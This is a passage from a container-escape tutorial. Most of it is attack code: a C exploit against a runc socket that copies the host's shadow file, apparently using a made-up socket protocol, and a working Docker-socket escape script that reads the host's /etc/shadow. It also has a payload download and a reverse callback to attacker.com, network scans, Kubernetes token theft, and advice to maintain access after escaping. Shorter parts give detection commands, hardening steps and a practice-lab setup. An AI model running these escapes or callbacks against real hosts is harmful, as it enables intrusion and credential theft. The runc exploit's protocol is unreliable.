        perror("[-] Failed to create payload file");
        return 1;
    }
    fprintf(payload_file, "%s", PAYLOAD);
    fclose(payload_file);
    chmod("/tmp/payload.sh", 0755);
    
    // 3. Connect to runc socket
    struct sockaddr_un addr;
    int sock = socket(AF_UNIX, SOCK_STREAM, 0);
    if (sock == -1) {
        perror("[-] Socket creation failed");
        return 1;
    }
    
    memset(&addr, 0, sizeof(addr));
    addr.sun_family = AF_UNIX;
    strncpy(addr.sun_path, RUNC_SOCKET, sizeof(addr.sun_path) - 1);
    
    printf("[+] Connecting to runc socket\n");
    if (connect(sock, (struct sockaddr*)&addr, sizeof(addr)) == -1) {
        perror("[-] Connection failed");
        return 1;
    }
    
    // 4. Craft exploit payload
    // Note: This is a framework for a real exploit targeting a specific vulnerability
    // Actual exploits would use specific protocol messages/commands
    
    char buffer[4096];
    snprintf(buffer, sizeof(buffer), 
        "{\n"
        "  \"type\": \"exec\",\n"
        "  \"payload\": {\n"
        "    \"command\": [\"/tmp/payload.sh\"],\n"
        "    \"env\": [\"PATH=/bin:/usr/bin\"],\n"
        "    \"tty\": false\n"
        "  }\n"
        "}\n");
    
    printf("[+] Sending payload to runc socket\n");
    if (write(sock, buffer, strlen(buffer)) == -1) {
        perror("[-] Failed to send payload");
        close(sock);
        return 1;
    }
    
    // 5. Check if exploit succeeded
    sleep(1);
    if (access("/tmp/shadow", F_OK) != -1) {
        printf("[+] Exploit successful! Host shadow file copied to /tmp/shadow\n");
    } else {
        printf("[-] Exploit failed or container not vulnerable\n");
    }
    
    close(sock);
    return 0;
}

Discovering New Capabilities-Based Escapes

Capabilities-based escapes are often overlooked:

// cap_abuse.c - Demonstrate a new capabilities-based escape
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/capability.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

// Forward declaration; the helper is defined after main()
int cap_dac_override_check(void);

int main() {
    // Check our current capabilities
    cap_t caps = cap_get_proc();
    if (caps == NULL) {
        perror("Failed to get capabilities");
        return 1;
    }
    
    printf("[+] Current capabilities:\n");
    char *caps_text = cap_to_text(caps, NULL);
    printf("%s\n", caps_text);
    cap_free(caps_text);
    cap_free(caps);
    
    // Look for interesting capabilities
    if (cap_dac_override_check()) {
        printf("[+] Found CAP_DAC_OVERRIDE capability\n");
        printf("[+] Attempting to access host files via side channel...\n");
        
        // In a real exploit, we would use the capability in a novel way
        // This is just a demonstration framework
        
        // Example: Use CAP_DAC_OVERRIDE to bypass permission checks on
        // a special device or interface that has access to host resources
        int fd = open("/dev/custom_interface", O_RDWR);
        if (fd != -1) {
            printf("[+] Successfully opened restricted interface\n");
            // Use the interface to escape
            close(fd);
        }
    }
    
    // Similarly check other capabilities for novel abuse vectors
    
    return 0;
}

// Check whether CAP_DAC_OVERRIDE is in the effective set using libcap
int cap_dac_override_check(void) {
    cap_t caps = cap_get_proc();
    cap_flag_value_t val = CAP_CLEAR;
    if (caps != NULL) {
        cap_get_flag(caps, CAP_DAC_OVERRIDE, CAP_EFFECTIVE, &val);
        cap_free(caps);
    }
    return val == CAP_SET;
}

Fuzzing Container Runtimes

Fuzzing has discovered numerous container escape vulnerabilities:

#!/usr/bin/env python3
# container_runtime_fuzzer.py - Basic framework for fuzzing container runtimes

import os
import random
import subprocess
import json
import time
import signal
from multiprocessing import Pool

# Configuration
ITERATIONS = 10000
DOCKER_BIN = "/usr/bin/docker"
TEST_IMAGE = "ubuntu:20.04"
OUTPUT_DIR = "./fuzzing_results"

# Fuzzing primitives
SPECIAL_STRINGS = [
    "../../../../../../../../etc/shadow",
    "/dev/random",
    "/proc/self/exe",
    "$(id)",
    "`cat /etc/shadow`",
    "\x00\xFF\x90\x12\x34",
    "\\",
    "%s%s%s%s%s%s%s%s%s%s",
]

MOUNT_TARGETS = [
    "/etc",
    "/proc",
    "/sys",
    "/dev",
    "/var/run",
    "/var/run/docker.sock",
    "/",
]

ENV_VARS = [
    "PATH=/bin:/usr/bin:/sbin:/usr/sbin",
    "TERM=xterm",
    "DISPLAY=:0",
    "HOME=/root",
    "LD_PRELOAD=/lib/evil.so",
    "DOCKER_HOST=unix:///var/run/docker.sock",
]

CAPABILITIES = [
    "ALL",
    "SYS_ADMIN",
    "NET_ADMIN",
    "SYS_PTRACE",
    "SYS_MODULE",
    "DAC_READ_SEARCH",
    "DAC_OVERRIDE",
]

def generate_random_string(length=10):
    """Generate a random string of the specified length."""
    charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_=+[]{}|;:,.<>?/"
    return ''.join(random.choice(charset) for _ in range(length))

def generate_fuzzy_volume():
    """Generate a random volume configuration."""
    src = random.choice([
        generate_random_string(),
        random.choice(SPECIAL_STRINGS),
        random.choice(MOUNT_TARGETS)
    ])
    
    dst = random.choice([
        generate_random_string(),
        random.choice(SPECIAL_STRINGS),
        "/mnt/fuzz",
        "/etc/passwd"
    ])
    
    mode = random.choice(["ro", "rw", "z", "Z", "shared", "rshared", "slave", "rslave"])
    
    return f"{src}:{dst}:{mode}"

def generate_fuzzy_command():
    """Generate a random command to execute in the container."""
    base_commands = [
        "sleep",
        "cat",
        "ls",
        "echo",
        "touch",
        "mount",
        "umount",
        "id",
        "sh -c",
        "bash -c",
    ]
    
    cmd = random.choice(base_commands)
    
    if random.random() < 0.5:
        cmd += " " + random.choice(SPECIAL_STRINGS)
    else:
        cmd += " " + generate_random_string()
    
    return cmd

def generate_fuzzy_container_config():
    """Generate a random container configuration for fuzzing."""
    config = {
        "Image": TEST_IMAGE,
        "Cmd": generate_fuzzy_command().split(),
        "Hostname": generate_random_string(),
        "Domainname": generate_random_string(),
        "User": random.choice(["root", "1000:1000", "nobody", "daemon", "65534"]),
        "AttachStdin": random.choice([True, False]),
        "AttachStdout": random.choice([True, False]),
        "AttachStderr": random.choice([True, False]),
        "Tty": random.choice([True, False]),
        "OpenStdin": random.choice([True, False]),
        "StdinOnce": random.choice([True, False]),
        "Env": [random.choice(ENV_VARS) for _ in range(random.randint(0, 5))],
        "Volumes": {random.choice(MOUNT_TARGETS): {} for _ in range(random.randint(0, 3))},
        "NetworkDisabled": random.choice([True, False]),
        "HostConfig": {
            "Binds": [generate_fuzzy_volume() for _ in range(random.randint(0, 3))],
            "CapAdd": [random.choice(CAPABILITIES) for _ in range(random.randint(0, 2))],
            "CapDrop": [random.choice(CAPABILITIES) for _ in range(random.randint(0, 2))],
            "Privileged": random.random() < 0.1,  # 10% chance of being privileged
            "ReadonlyRootfs": random.choice([True, False]),
            "IpcMode": random.choice(["", "host", "container:fuzzy", "private"]),
            "PidMode": random.choice(["", "host", "container:fuzzy"]),
            "NetworkMode": random.choice(["default", "bridge", "host", "none"]),
            "UTSMode": random.choice(["", "host"]),
            "Devices": [],  # We could fuzz device mappings too
            "ShmSize": random.choice([0, 64*1024*1024, 128*1024*1024]),
        }
    }
    
    # Sometimes add a custom seccomp profile (careful, can crash the system!)
    if random.random() < 0.05:  # 5% chance
        config["HostConfig"]["SecurityOpt"] = [
            "seccomp=" + json.dumps({
                "defaultAction": random.choice(["SCMP_ACT_ALLOW", "SCMP_ACT_ERRNO", "SCMP_ACT_KILL"]),
                "syscalls": [{"names": ["open", "read", "write"], "action": "SCMP_ACT_ALLOW"}]
            })
        ]
    
    return config

def run_fuzzing_test(iteration):
    """Run a single fuzzing test iteration."""
    try:
        config = generate_fuzzy_container_config()
        
        # Log the test case
        test_case_file = os.path.join(OUTPUT_DIR, f"test_case_{iteration}.json")
        with open(test_case_file, "w") as f:
            json.dump(config, f, indent=2)
        
        # Create the container with our fuzzy config
        container_config_file = os.path.join(OUTPUT_DIR, f"container_config_{iteration}.json")
        with open(container_config_file, "w") as f:
            json.dump(config, f, indent=2)
        
        # Use docker create with our config
        create_cmd = [DOCKER_BIN, "create"]
        
        # Add host config options
        host_config = config["HostConfig"]
        if host_config.get("Binds"):
            for bind in host_config["Binds"]:
                create_cmd.extend(["-v", bind])
        
        if host_config.get("CapAdd"):
            for cap in host_config["CapAdd"]:
                create_cmd.extend(["--cap-add", cap])
        
        if host_config.get("CapDrop"):
            for cap in host_config["CapDrop"]:
                create_cmd.extend(["--cap-drop", cap])
        
        if host_config.get("Privileged"):
            create_cmd.append("--privileged")
        
        if host_config.get("ReadonlyRootfs"):
            create_cmd.append("--read-only")
        
        # Add other config options
        create_cmd.extend(["--hostname", config["Hostname"]])
        for env in config["Env"]:
            create_cmd.extend(["-e", env])
        
        # Add the image and command
        create_cmd.append(config["Image"])
        create_cmd.extend(config["Cmd"])
        
        # Run the command with a timeout
        try:
            create_process = subprocess.Popen(
                create_cmd,
                stdout=subprocess.PIPE,
                stderr=subprocess.PIPE
            )
            
            # Set a timeout
            def timeout_handler(signum, frame):
                create_process.kill()
                raise TimeoutError("Process timed out")
            
            signal.signal(signal.SIGALRM, timeout_handler)
            signal.alarm(5)  # 5 second timeout
            
            stdout, stderr = create_process.communicate()
            signal.alarm(0)  # Cancel the alarm
            
            container_id = stdout.decode().strip()
            
            # Log the results
            result = {
                "iteration": iteration,
                "container_id": container_id,
                "exit_code": create_process.returncode,
                "stdout": stdout.decode(),
                "stderr": stderr.decode()
            }
            
            result_file = os.path.join(OUTPUT_DIR, f"result_{iteration}.json")
            with open(result_file, "w") as f:
                json.dump(result, f, indent=2)
            
            # Check if we successfully created a container
            if create_process.returncode == 0 and container_id:
                # Start the container (might trigger bugs)
                start_cmd = [DOCKER_BIN, "start", container_id]
                start_process = subprocess.Popen(
                    start_cmd,
                    stdout=subprocess.PIPE,
                    stderr=subprocess.PIPE
                )
                
                signal.alarm(5)  # 5 second timeout
                start_stdout, start_stderr = start_process.communicate()
                signal.alarm(0)  # Cancel the alarm
                
                # Log the start results
                start_result = {
                    "iteration": iteration,
                    "container_id": container_id,
                    "exit_code": start_process.returncode,
                    "stdout": start_stdout.decode(),
                    "stderr": start_stderr.decode()
                }
                
                start_result_file = os.path.join(OUTPUT_DIR, f"start_result_{iteration}.json")
                with open(start_result_file, "w") as f:
                    json.dump(start_result, f, indent=2)
                
                # Let it run briefly
                time.sleep(1)
                
                # Clean up the container
                subprocess.run([DOCKER_BIN, "rm", "-f", container_id], 
                              stdout=subprocess.DEVNULL, 
                              stderr=subprocess.DEVNULL)
        
        except TimeoutError:
            # Log timeout
            timeout_result = {
                "iteration": iteration,
                "timeout": True,
                "command": " ".join(create_cmd)
            }
            
            timeout_file = os.path.join(OUTPUT_DIR, f"timeout_{iteration}.json")
            with open(timeout_file, "w") as f:
                json.dump(timeout_result, f, indent=2)
            
            # Try to clean up any container that might have been created
            try:
                containers = subprocess.check_output([DOCKER_BIN, "ps", "-aq"]).decode().strip().split("\n")
                for container in containers:
                    if container:
                        subprocess.run([DOCKER_BIN, "rm", "-f", container], 
                                      stdout=subprocess.DEVNULL, 
                                      stderr=subprocess.DEVNULL)
            except:
                pass
    
    except Exception as e:
        # Log any exceptions
        error_result = {
            "iteration": iteration,
            "error": str(e)
        }
        
        error_file = os.path.join(OUTPUT_DIR, f"error_{iteration}.json")
        with open(error_file, "w") as f:
            json.dump(error_result, f, indent=2)

def main():
    """Main fuzzing function."""
    # Create output directory
    os.makedirs(OUTPUT_DIR, exist_ok=True)
    
    print(f"[+] Starting container runtime fuzzing with {ITERATIONS} iterations")
    print(f"[+] Results will be saved to {OUTPUT_DIR}")
    
    # Run tests in parallel
    with Pool(processes=os.cpu_count()) as pool:
        pool.map(run_fuzzing_test, range(ITERATIONS))
    
    print("[+] Fuzzing complete")
    print("[+] Analyzing results for potential vulnerabilities...")
    
    # Simple result analysis
    crashes = 0
    timeouts = 0
    errors = 0
    
    for filename in os.listdir(OUTPUT_DIR):
        if filename.startswith("error_"):
            errors += 1
        elif filename.startswith("timeout_"):
            timeouts += 1
        elif filename.startswith("result_"):
            with open(os.path.join(OUTPUT_DIR, filename), "r") as f:
                result = json.load(f)
                if result["exit_code"] != 0:
                    crashes += 1
    
    print(f"[+] Analysis complete:")
    print(f"  - Crashes: {crashes}")
    print(f"  - Timeouts: {timeouts}")
    print(f"  - Errors: {errors}")
    print("[+] Check the output directory for detailed logs")

if __name__ == "__main__":
    main()

Developing Zero-Day Exploits Responsibly

When you discover a new container escape vulnerability:

  1. Document thoroughly: Record all steps, affected versions, and prerequisites.
  2. Develop a proof-of-concept: Create a minimal working example.
  3. Contact the vendor: Follow responsible disclosure procedures.
  4. Allow time for patching: Typically 90 days before publication.
  5. Publish details after patch: Share knowledge to improve security.

Research Decision Tree

What area are you researching?
├── Container runtime (Docker, containerd)
│   ├── Focus on → Namespace transitions, capability management
│   └── Methods → Source code auditing, fuzzing API endpoints
├── Linux kernel features used by containers
│   ├── Focus on → cgroups, namespaces, capabilities
│   └── Methods → Code review, syscall fuzzing
├── Orchestration platforms (Kubernetes)
│   ├── Focus on → API server, kubelet, etcd
│   └── Methods → Authentication bypass, permission escalation
└── Container images and build processes
    ├── Focus on → Build systems, base images
    └── Methods → Supply chain attacks, backdooring

Common Pitfalls & Troubleshooting

Even experienced security researchers face challenges with container escapes. Here's how to overcome common issues:

Container Escape Failures

Problem: The escape technique fails despite meeting all prerequisites.

Troubleshooting Steps:

Kernel hardening features:

# Check if kernel hardening is enabled
sysctl -a | grep -E 'dmesg|kptr_restrict|perf_event_paranoid|protected_hardlinks|protected_symlinks|unprivileged_bpf_disabled'

Check for security modules:

# Is AppArmor enabled?
cat /proc/self/attr/current

# Is SELinux enabled?
getenforce 2>/dev/null || echo "No SELinux"

# Check seccomp status
grep Seccomp /proc/self/status

Verify container configuration:

# Check if you're really in a container
grep -q 'docker\|lxc\|containerd' /proc/1/cgroup && echo "In container" || echo "Not in container"

# Verify capabilities
capsh --print

# Check your current namespaces
ls -la /proc/self/ns/

Escaping Without Common Tools

Problem: Target container has minimal tools installed.

Solution:

Use statically compiled binaries:

# If you can transfer files, use statically compiled tools
# Example: Statically compiled busybox
chmod +x ./busybox
./busybox wget http://attacker.com/payload -O /tmp/payload

Create temporary scripts:

# Create a minimal TCP callback script if Python is available
cat > /tmp/callback.py << 'EOF'
import socket
s = socket.socket()
s.connect(('attacker.com', 4444))
s.send(b'Container escaped!\n')
EOF
python /tmp/callback.py

Use bash built-ins:

# Instead of curl
exec 3<>/dev/tcp/google.com/80
echo -e "GET / HTTP/1.1\r\nHost: google.com\r\n\r\n" >&3
cat <&3

# Instead of wget (writes the raw HTTP response, headers included, to a file)
exec 3<>/dev/tcp/example.com/80
echo -e "GET /file HTTP/1.1\r\nHost: example.com\r\nConnection: close\r\n\r\n" >&3
cat <&3 > /tmp/response

# Network scanning without nmap
for port in {1..1024}; do (echo >/dev/tcp/target-host/$port) >/dev/null 2>&1 && echo "Port $port open"; done

Improved Error Handling in Exploits

Always add robust error handling to your container escape scripts:

#!/bin/bash
# robust_escape.sh - Container escape with error handling

# Exit on errors and make the ERR trap fire inside functions
set -eE

# Logging function
log() {
    echo "[$(date +%T)] $1"
}

# Error handling function
handle_error() {
    local error_code=$?
    log "ERROR: Command failed with exit code $error_code"
    log "ERROR: Line that failed: ${BASH_COMMAND}"
    
    # Attempt cleanup
    log "Attempting cleanup..."
    # Add your cleanup commands here
    
    exit $error_code
}

# Set error handler
trap handle_error ERR

# Main escape function
escape_container() {
    log "Starting container escape"
    
    # Check prerequisites
    log "Checking prerequisites"
    if [ ! -S /var/run/docker.sock ]; then
        log "Docker socket not found, trying alternative methods"
        # Try alternative methods
        return 1
    fi
    
    log "Docker socket found, proceeding with escape"
    # Rest of escape code
    # ...
    
    return 0
}

# Alternative method if primary fails
alternative_escape() {
    log "Attempting alternative escape method"
    # Alternative escape code
    # ...
}

# Main execution
log "Starting escape sequence"

if ! escape_container; then
    log "Primary escape failed, trying alternative"
    alternative_escape
fi

log "Escape sequence completed"

Dealing with Restricted Network Access

When containers have limited network access:

# Check network connectivity
ip a
ip route
cat /etc/resolv.conf

# Test DNS resolution
host google.com || echo "DNS not working"

# Test outbound connectivity
timeout 5 bash -c "</dev/tcp/8.8.8.8/53" && echo "Network access available" || echo "No network access"

# If IPv4 is blocked, try IPv6
timeout 5 bash -c "</dev/tcp/[2001:4860:4860::8888]/53" && echo "IPv6 available" || echo "No IPv6 access"

# Check if you can reach the host network
# If you have hostNetwork: true in Kubernetes or --network=host in Docker
for prefix in $(ip route | grep -v 'default' | cut -d' ' -f1 | cut -d'/' -f1 | sed 's/\.[0-9]*$//' | sort -u); do
  echo "Checking subnet $prefix.0/24"
  for host in $(seq 1 254); do
    timeout 0.1 bash -c "</dev/tcp/$prefix.$host/22" 2>/dev/null && echo "Host found: $prefix.$host with SSH open"
  done
done

Kubernetes Troubleshooting

Common issues with Kubernetes-specific escape techniques:

# 1. Service account token issues
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
if [ -z "$TOKEN" ]; then
    echo "No service account token found"
    # Try alternative locations
    for path in /run/secrets/kubernetes.io/serviceaccount /secrets/token; do
        if [ -f "$path/token" ]; then
            TOKEN=$(cat "$path/token")
            echo "Found token at $path/token"
            break
        fi
    done
fi

# 2. API server access issues
API_SERVER="https://kubernetes.default.svc"
if ! curl -k -s "$API_SERVER/healthz" > /dev/null; then
    echo "Cannot reach API server at $API_SERVER"
    # Try alternative discovery
    for subnet in 10.0.0 10.100.0 10.96.0 172.17.0; do
        for i in {1..10}; do
            if curl -k -s --connect-timeout 1 "https://$subnet.$i:443/healthz" > /dev/null; then
                echo "Found potential API server at $subnet.$i"
                API_SERVER="https://$subnet.$i:443"
                break 2
            fi
        done
    done
fi

# 3. Permission issues
if ! curl -k -s -H "Authorization: Bearer $TOKEN" "$API_SERVER/api/v1/namespaces" > /dev/null; then
    echo "Permission denied with current token"
    # Check what permissions we do have
    curl -k -s -H "Authorization: Bearer $TOKEN" \
      "$API_SERVER/apis/authorization.k8s.io/v1/selfsubjectrulesreviews" \
      -X POST -H "Content-Type: application/json" \
      -d '{"kind":"SelfSubjectRulesReview","apiVersion":"authorization.k8s.io/v1","spec":{"namespace":"default"}}'
fi

Blue Team: Detecting Escape Attempts

For defenders, identifying escape attempts is crucial:

# 1. Monitor for suspicious processes
grep -l docker /proc/*/cgroup 2>/dev/null | grep -v "^/proc/$$/cgroup$" | while read -r proc_cgroup; do
    pid=$(echo "$proc_cgroup" | cut -d/ -f3)
    cmd=$(cat "/proc/$pid/cmdline" 2>/dev/null | tr '\0' ' ')
    echo "Container process $pid running: $cmd"
done

# 2. Check for unexpected capabilities
find /proc/*/status 2>/dev/null | xargs grep -l "CapEff:" | while read -r proc_status; do
    pid=$(echo "$proc_status" | cut -d/ -f3)
    caps=$(grep "CapEff:" "$proc_status" | awk '{print $2}')
    
    # Count the set bits in the effective capability mask (popcount)
    cap_count=0
    mask=$((16#$caps))
    while [ "$mask" -gt 0 ]; do
      cap_count=$((cap_count + (mask & 1)))
      mask=$((mask >> 1))
    done
    
    if [ "$cap_count" -gt 10 ]; then
        echo "Process $pid has $cap_count capabilities: $caps"
        cat "/proc/$pid/cmdline" | tr '\0' ' '
    fi
done

# 3. Monitor for container breakout indicators
watch -n 5 'dmesg | grep -E "SECURITY|AUDIT|WARN" | tail -n 20'

# 4. Monitor Docker socket access
auditctl -w /var/run/docker.sock -p rwxa -k docker_socket_access
ausearch -k docker_socket_access

Key Takeaways & Resources

After years of researching container escapes, here are the most critical lessons:

Core Security Principles

  1. Defense in depth is essential: Never rely on containers as your only security boundary.
  2. Privilege minimization works: Most escapes require privileged access of some kind.
  3. Shared kernels create shared risks: Container isolation will never be as strong as VM isolation.
  4. Configuration matters more than technology: Properly configured containers are reasonably secure; misconfigured ones are trivial to escape.
  5. Security vs. usability tradeoffs: The most secure container configurations are often the least convenient.

For Defenders: Essential Hardening Steps

  1. Never run privileged containers in production
  2. Never mount the Docker socket inside containers
  3. Use read-only root filesystems whenever possible
  4. Implement network policies to limit container communication
  5. Use security contexts and Pod Security Standards in Kubernetes
  6. Keep host kernels and container runtimes updated
  7. Run runtime security monitoring tools
  8. Consider enhanced isolation technologies (gVisor, Kata Containers)
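
A quick way to measure a host against these baselines is a CIS benchmark run. Below is a sketch using the docker-bench-security image, simplified from the project's recommended invocation; with fewer read-only mounts, some checks may be skipped:

# Audit the Docker host against the CIS Docker Benchmark
docker run --rm --net host --pid host --userns host --cap-add audit_control \
  -v /etc:/etc:ro \
  -v /var/lib:/var/lib:ro \
  -v /var/run/docker.sock:/var/run/docker.sock:ro \
  --label docker_bench_security \
  docker/docker-bench-security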

For Attackers: Methodical Approach

  1. Start with reconnaissance to identify the environment
  2. Check for common misconfigurations first
  3. Look for access to the Docker socket or privileged containers
  4. Identify mounted sensitive paths that may enable escapes
  5. Check for service account tokens in Kubernetes environments
  6. Look for kernel vulnerabilities as a last resort
  7. Maintain access once escaped
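
The first steps of this list compress into a short triage script; here is a minimal sketch that degrades gracefully when tools such as capsh are missing:

#!/bin/bash
# quick_triage.sh - first-pass, in-container checks for the list above (sketch)
echo "[*] Docker socket:";     ls -l /var/run/docker.sock 2>/dev/null || echo "    not mounted"
echo "[*] Capabilities:";      capsh --print 2>/dev/null | grep Current || grep CapEff /proc/self/status
echo "[*] Seccomp:";           grep Seccomp /proc/self/status
echo "[*] AppArmor label:";    cat /proc/self/attr/current 2>/dev/null
echo "[*] Suspicious mounts:"; grep -E 'docker.sock|kubelet|/hostfs' /proc/self/mounts || echo "    none obvious"
echo "[*] K8s SA token:";      ls /var/run/secrets/kubernetes.io/serviceaccount/ 2>/dev/null || echo "    not present"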

Comprehensive Container Security Tools

Runtime Security: Falco (real-time container runtime monitoring), Sysdig (container monitoring and forensics), Aqua Security (commercial container security platform)
Vulnerability Scanning: Trivy (container and filesystem vulnerability scanner), Clair (static container vulnerability analyzer), Anchore (deep container analysis)
Network Security: Calico (network policy for Kubernetes), Cilium (eBPF-based network security), Istio (service mesh with security features)
Configuration Analysis: Kube-bench (CIS benchmark for Kubernetes), Docker-bench-security (CIS benchmark for Docker), Kubesec (security risk analysis for Kubernetes resources)
Penetration Testing: Kube-hunter (Kubernetes penetration testing tool), Amicontained (container introspection tool), Deepce (container enumeration and exploitation tool)

Essential References

  1. Research Papers
    • Understanding and Hardening Linux Containers (NCC Group)
    • A Survey of Container Security (ACM Computing Surveys)
  2. Books
    • Container Security by Liz Rice
    • Kubernetes Security by Liz Rice and Michael Hausenblas
    • Docker Security by Adrian Mouat

Build Your Own Container Security Lab

To practice these techniques safely:

#!/bin/bash
# setup_container_security_lab.sh - Create a comprehensive container security practice lab

echo "[+] Setting up Container Security Lab"

# Create a directory for the lab
mkdir -p ~/container-security-lab
cd ~/container-security-lab

# Create a Vagrantfile for isolated testing
cat > Vagrantfile << 'EOF'
Vagrant.configure("2") do |config|
  config.vm.box = "ubuntu/focal64"
  config.vm.hostname = "container-lab"
  
  # Allocate resources
  config.vm.provider "virtualbox" do |vb|
    vb.memory = 4096
    vb.cpus = 2
    vb.name = "container-security-lab"
  end
  
  # Provision with Docker and Kubernetes tools
  config.vm.provision "shell", inline: <<-SHELL
    # Update and install dependencies
    apt-get update
    apt-get install -y apt-transport-https ca-certificates curl software-properties-common

    # Install Docker
    curl -fsSL https://download.docker.com/linux/ubuntu/gpg | apt-key add -
    add-apt-repository "deb [arch=amd64] https://download.docker.com/linux/ubuntu $(lsb_release -cs) stable"
    apt-get update
    apt-get install -y docker-ce docker-ce-cli containerd.io
    usermod -aG docker vagrant

    # Install kubectl
    curl -LO "https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl"
    chmod +x kubectl
    mv kubectl /usr/local/bin/

    # Install Minikube
    curl -LO https://storage.googleapis.com/minikube/releases/latest/minikube-linux-amd64
    chmod +x minikube-linux-amd64
    mv minikube-linux-amd64 /usr/local/bin/minikube

    # Create directory for lab files
    mkdir -p /home/vagrant/lab
    chown -R vagrant:vagrant /home/vagrant/lab
    
    # Create vulnerable Docker containers
    cat > /home/vagrant/lab/create_vulnerable_containers.sh << 'EOFINNER'
#!/bin/bash
# Create containers with various security issues for practice

# Container with Docker socket mounted
docker run -d --name docker-socket-container -v /var/run/docker.sock:/var/run/docker.sock ubuntu:20.04 sleep infinity

# Privileged container
docker run -d --name privileged-container --privileged ubuntu:20.04 sleep infinity

# Container with host path mounted
docker run -d --name host-mount-container -v /:/host:ro ubuntu:20.04 sleep infinity

# Container with capabilities added
docker run -d --name capabilities-container --cap-add SYS_ADMIN --cap-add SYS_PTRACE ubuntu:20.04 sleep infinity

# Container using host network
docker run -d --name host-network-container --network=host ubuntu:20.04 sleep infinity

# Container with AppArmor disabled
docker run -d --name apparmor-disabled-container --security-opt apparmor=unconfined ubuntu:20.04 sleep infinity

echo "Created vulnerable containers for testing:"
docker ps
EOFINNER
    chmod +x /home/vagrant/lab/create_vulnerable_containers.sh
    
    # Create Minikube setup script
    cat > /home/vagrant/lab/setup_minikube.sh << 'EOFINNER'
#!/bin/bash
# Set up Minikube with vulnerable configurations

# Start Minikube
minikube start --driver=docker

# Create a vulnerable ServiceAccount with excessive permissions
kubectl create serviceaccount vulnerable-sa
kubectl create clusterrolebinding vulnerable-binding --clusterrole=cluster-admin --serviceaccount=default:vulnerable-sa

# Create a vulnerable Pod using the ServiceAccount
cat << EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
  name: vulnerable-pod
spec:
  serviceAccountName: vulnerable-sa
  containers:
  - name: vulnerable-container
    image: ubuntu:20.04
    command: ["sleep", "infinity"]
EOF

# Create a Pod with hostPath
cat << EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
  name: hostpath-pod
spec:
  containers:
  - name: hostpath-container
    image: ubuntu:20.04
    command: ["sleep", "infinity"]
    volumeMounts:
    - mountPath: /host
      name: hostpath
  volumes:
  - name: hostpath
    hostPath:
      path: /
EOF

# Create a privileged Pod
cat << EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
  name: privileged-pod
spec:
  containers:
  - name: privileged-container
    image: ubuntu:20.04
    command: ["sleep", "infinity"]
    securityContext:
      privileged: true
EOF

echo "Created vulnerable Kubernetes resources:"
kubectl get pods,sa
EOFINNER
    chmod +x /home/vagrant/lab/setup_minikube.sh
    
    # Create a README with instructions
    cat > /home/vagrant/lab/README.md << 'EOFINNER'
# Container Security Lab

This lab contains deliberately vulnerable containers and Kubernetes resources for practicing container escape techniques.

## Docker Containers

Run the script to create vulnerable Docker containers:

./create_vulnerable_containers.sh

Then practice escape techniques on each container:

docker exec -it docker-socket-container bash
docker exec -it privileged-container bash
docker exec -it host-mount-container bash
docker exec -it capabilities-container bash
docker exec -it host-network-container bash
docker exec -it apparmor-disabled-container bash


## Kubernetes Resources

Set up the Minikube cluster with vulnerable resources:

./setup_minikube.sh

Then practice Kubernetes-specific escapes:

kubectl exec -it vulnerable-pod -- bash
kubectl exec -it hostpath-pod -- bash
kubectl exec -it privileged-pod -- bash


## Safety Warning

This lab is for educational purposes only. All vulnerable configurations should be restricted to this lab environment and never used in production.
EOFINNER
  SHELL
end
EOF

echo "[+] Vagrantfile created"

# Create lab directories
mkdir -p exploits scripts resources

# Add a sample exploit
cat > exploits/docker_socket_escape.sh << 'EOF'
#!/bin/bash
# docker_socket_escape.sh - Simple Docker socket escape demo

echo "[+] Docker Socket Container Escape PoC"

if [ ! -S /var/run/docker.sock ]; then
    echo "[-] Docker socket not found at /var/run/docker.sock"
    exit 1
fi

echo "[+] Docker socket found, creating a privileged container"

CONTAINER_ID=$(curl -s -X POST \
  --unix-socket /var/run/docker.sock \
  -H "Content-Type: application/json" \
  -d '{"Image":"alpine:latest","Cmd":["/bin/sh","-c","sleep 30"],"Binds":["/:/hostfs"],"Privileged":true}' \
  http://localhost/containers/create | grep -o '"Id":"[^"]*' | cut -d '"' -f 4)

if [ -z "$CONTAINER_ID" ]; then
    echo "[-] Failed to create container"
    exit 1
fi

echo "[+] Container created: $CONTAINER_ID"
echo "[+] Starting container"

curl -s -X POST \
  --unix-socket /var/run/docker.sock \
  http://localhost/containers/$CONTAINER_ID/start

echo "[+] Reading host's /etc/shadow file"

curl -s -X POST \
  --unix-socket /var/run/docker.sock \
  -H "Content-Type: application/json" \
  -d '{"AttachStdin":false,"AttachStdout":true,"AttachStderr":true,"Cmd":["cat","/hostfs/etc/shadow"]}' \
  http://localhost/containers/$CONTAINER_ID/exec | grep -o '"Id":"[^"]*' | cut -d '"' -f 4 | xargs -I{} \
  curl -s -X POST --unix-socket /var/run/docker.sock -H "Content-Type: application/json" -d '{"Detach":false,"Tty":false}' http://localhost/exec/{}/start

echo "[+] Cleaning up container"
curl -s -X DELETE --unix-socket /var/run/docker.sock http://localhost/containers/$CONTAINER_ID?force=true

echo "[+] Escape complete"
EOF
chmod +x exploits/docker_socket_escape.sh

# Create a start script
cat > start_lab.sh << 'EOF'
#!/bin/bash
echo "[+] Starting Container Security Lab"
vagrant up
echo "[+] Lab VM is running. Connect using: vagrant ssh"
echo "[+] Once connected, navigate to ~/lab and follow the README.md instructions"
EOF
chmod +x start_lab.sh

echo "[+] Lab setup complete! Start it with: ./start_lab.sh"

Final Thoughts

Container security is a rapidly evolving field. What makes container escape techniques fascinating is the balance between isolation and usability. Perfect security would render containers unusable for many real-world applications. This inherent tension creates a constantly shifting landscape of vulnerabilities and mitigations.

As you continue your container security journey, remember that both offensive and defensive perspectives are valuable. Understanding how to escape containers makes you better at securing them, and understanding proper container hardening makes you more effective at finding escape vectors.

Keep learning, stay curious, and always practice these techniques responsibly in controlled environments.
